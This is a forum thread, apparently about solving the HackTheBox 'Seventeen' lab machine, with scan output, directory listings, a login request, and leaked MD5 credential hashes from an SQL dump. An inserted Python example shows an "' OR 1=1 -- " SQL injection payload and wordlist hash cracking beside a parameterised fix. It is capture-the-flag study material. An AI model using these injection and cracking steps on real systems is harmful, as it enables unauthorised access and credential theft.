Posts: 213 Threads: 0 Joined: N/A
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 2e:b2:6e:bb:92:7d:5e:6b:36:93:17:1a:82:09:e4:64 (RSA)
|   256 1f:57:c6:53:fc:2d:8b:51:7d:30:42:02:a4:d6:5f:44 (ECDSA)
|_  256 d5:a5:36:38:19:fe:0d:67:79:16:e6:da:17:91:eb:ad (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Let's begin your education with us!
|_http-server-header: Apache/2.4.29 (Ubuntu)
8000/tcp open  http    Apache httpd 2.4.38
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.38 (Debian)
Posts: 46 Threads: 0 Joined: N/A
http://exam.seventeen.htb/admin/login.php
/index.php      [Size: 17375]
/about.html     [Size: 2458]
/about.php      [Size: 3382]
/home.php       [Size: 455]
/uploads        [Size: 315] [--> http://exam.seventeen.htb/uploads/]
/welcome.html   [Size: 652]
/assets         [Size: 314] [--> http://exam.seventeen.htb/assets/]
/admin          [Size: 313] [--> http://exam.seventeen.htb/admin/]
/plugins        [Size: 315] [--> http://exam.seventeen.htb/plugins/]
/database       [Size: 316] [--> http://exam.seventeen.htb/database/]
/dist           [Size: 312] [--> http://exam.seventeen.htb/dist/]
/classes        [Size: 315] [--> http://exam.seventeen.htb/classes/]
/404.html       [Size: 198]
/config.php     [Size: 0]
/inc            [Size: 311] [--> http://exam.seventeen.htb/inc/]
/build          [Size: 313] [--> http://exam.seventeen.htb/build/]
/exams.php      [Size: 1261]
/libs           [Size: 312] [--> http://exam.seventeen.htb/libs/]
I think we can upload some file after bypassing the admin login, which is not enabled.
Posts: 43 Threads: 0 Joined: N/A
I found some endpoints in the exam JS file.
And you should look at:
POST /classes/Login.php?f=login HTTP/1.1
Host: exam.seventeen.htb
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://exam.seventeen.htb/?p=products&search=a
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ba748c37fe5ea0c4d511c49449dc532a
Connection: close
Content-Length: 33
username=admin&password=test
Posts: 46 Threads: 0 Joined: N/A
(May 28, 2022, 07:52 PM)iamnoone777 Wrote: I found some endpoints in the exam JS file.
From where did you get the exam.js file?
Posts: 213 Threads: 0 Joined: N/A
There are three folders under http://seventeen.htb/vendor/: exams, mastermailer, oldmanagement
Posts: 43 Threads: 0 Joined: N/A
(May 28, 2022, 08:11 PM)Exa Wrote: There are three folders under http://seventeen.htb/vendor/: exams, mastermailer, oldmanagement
That sounds promising.
Posts: 213 Threads: 0 Joined: N/A
There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter).
Using sqlmap, I found a valid login.
Posts: 43 Threads: 0 Joined: N/A
(May 28, 2022, 08:18 PM)Exa Wrote: There is an SQL injection vulnerability on http://seventeen.htb/vendor/oldmanagement/ (the stud_no parameter).
There are also credentials in http://seventeen.htb/vendor/oldmanagement/db/db_sfms.sql
INSERT INTO `student` (`stud_id`, `stud_no`, `firstname`, `lastname`, `gender`, `yr&sec`, `password`) VALUES (1, 12345, 'John', 'Smith', 'Male', '3A', '827ccb0eea8a706c4c34a16891f84e7b');
INSERT INTO `user` (`user_id`, `firstname`, `lastname`, `username`, `password`, `status`) VALUES (1, 'Administrator', '', 'admin', '21232f297a57a5a743894a0e4a801fc3', 'administrator'), (2, 'Claire', 'Temple', 'claire', '827ccb0eea8a706c4c34a16891f84e7b', 'Regular');
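An added worked example, not code from any post in this thread and not the oldmanagement application's code: it parses the two INSERT statements quoted above from db_sfms.sql, loads them into an in-memory SQLite database, shows a hypothetical stud_no lookup written the injectable way beside a parameterised version, and cracks the dumped MD5 hashes against a small constructed wordlist. The table and column names and the hashes are the ones in the dump on this page; the wordlist, the payload and both login functions are assumptions made for the example.

```python
"""Added example for the db_sfms.sql dump and the stud_no injection discussed
in the thread. Not any poster's code and not the real oldmanagement code: the
two login functions are a hypothetical reconstruction of an injectable lookup
and its parameterised fix."""
import csv
import hashlib
import re
import sqlite3

# The two INSERT statements exactly as quoted from db_sfms.sql in the thread.
DUMP_SQL = """
INSERT INTO `student` (`stud_id`, `stud_no`, `firstname`, `lastname`, `gender`, `yr&sec`, `password`) VALUES (1, 12345, 'John', 'Smith', 'Male', '3A', '827ccb0eea8a706c4c34a16891f84e7b');
INSERT INTO `user` (`user_id`, `firstname`, `lastname`, `username`, `password`, `status`) VALUES (1, 'Administrator', '', 'admin', '21232f297a57a5a743894a0e4a801fc3', 'administrator'), (2, 'Claire', 'Temple', 'claire', '827ccb0eea8a706c4c34a16891f84e7b', 'Regular');
"""

# Constructed wordlist (assumption; a real run would use rockyou or similar).
WORDLIST = ["password", "admin", "12345", "123456", "letmein", "welcome"]

# Which column holds the login name in each dumped table.
LOGIN_COLUMN = {"student": "stud_no", "user": "username"}

INSERT_RE = re.compile(r"INSERT INTO `(\w+)` \(([^)]*)\) VALUES (.*?);", re.S)
TUPLE_RE = re.compile(r"\(([^)]*)\)")


def parse_inserts(sql):
    """Return {table: (columns, rows)} from MySQL-style INSERT ... VALUES dumps.

    Each value tuple is read with the csv module so quoted strings containing
    commas or doubled quotes survive; numbers come back as strings."""
    tables = {}
    for table, cols, values in INSERT_RE.findall(sql):
        columns = [c.strip().strip("`") for c in cols.split(",")]
        rows = [next(csv.reader([t], quotechar="'", skipinitialspace=True))
                for t in TUPLE_RE.findall(values)]
        tables[table] = (columns, rows)
    return tables


def load_db(sql):
    """Create the dumped tables in an in-memory SQLite database.

    Table and column names are interpolated, but they come from the dump we
    control; the row values go through bound placeholders."""
    con = sqlite3.connect(":memory:")
    for table, (columns, rows) in parse_inserts(sql).items():
        cols = ", ".join(f'"{c}"' for c in columns)
        marks = ", ".join("?" * len(columns))
        con.execute(f'CREATE TABLE "{table}" ({cols})')
        con.executemany(f'INSERT INTO "{table}" VALUES ({marks})', rows)
    return con


def student_login_vulnerable(con, stud_no, password):
    """Injectable (hypothetical): stud_no is pasted straight into the SQL text."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    query = ("SELECT firstname, lastname FROM student "
             f"WHERE stud_no = '{stud_no}' AND password = '{pw_hash}'")
    return con.execute(query).fetchone()


def student_login_fixed(con, stud_no, password):
    """Same lookup with bound parameters: the payload is only ever a value."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    return con.execute(
        "SELECT firstname, lastname FROM student WHERE stud_no = ? AND password = ?",
        (stud_no, pw_hash),
    ).fetchone()


def dump_credentials(sql):
    """List (table, login, md5_hash) triples found in the dump."""
    creds = []
    for table, (columns, rows) in parse_inserts(sql).items():
        for row in rows:
            record = dict(zip(columns, row))
            creds.append((table, record[LOGIN_COLUMN[table]], record["password"]))
    return creds


def crack_dump(sql, wordlist):
    """Map 'table:login' to the recovered password, or None if not in the list."""
    lookup = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {f"{table}:{login}": lookup.get(pw_hash)
            for table, login, pw_hash in dump_credentials(sql)}


DB = load_db(DUMP_SQL)
# Closes the stud_no string early and comments out the password check.
PAYLOAD = "' OR 1=1 -- "

if __name__ == "__main__":
    print("vulnerable, payload :", student_login_vulnerable(DB, PAYLOAD, "wrong"))
    print("fixed, payload      :", student_login_fixed(DB, PAYLOAD, "wrong"))
    print("fixed, real creds   :", student_login_fixed(DB, "12345", "12345"))
    print("cracked             :", crack_dump(DUMP_SQL, WORDLIST))
```

The comment payload works against the concatenated query because everything after `--`, including the password comparison, is discarded; the parameterised version treats the same payload as a literal stud_no and returns nothing. The cracked values show the dump stores unsalted MD5 of trivial strings, which is also why claire and the student share a hash.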
Posts: 213 Threads: 0 Joined: N/A
(May 28, 2022, 08:25 PM)iamnoone777 Wrote: There are also credentials in http://seventeen.htb/vendor/oldmanagement/db/db_sfms.sql
These credentials are different from the ones I read out via sqlmap. So far, I found three tables containing password hashes. One is for the student login.
Posts: 43 Threads: 0 Joined: N/A
(May 28, 2022, 08:47 PM)Exa Wrote: These credentials are different from the ones I read out via sqlmap. So far, I found three tables containing password hashes. One is for the student login.
My sqlmap is running; I will post the result here.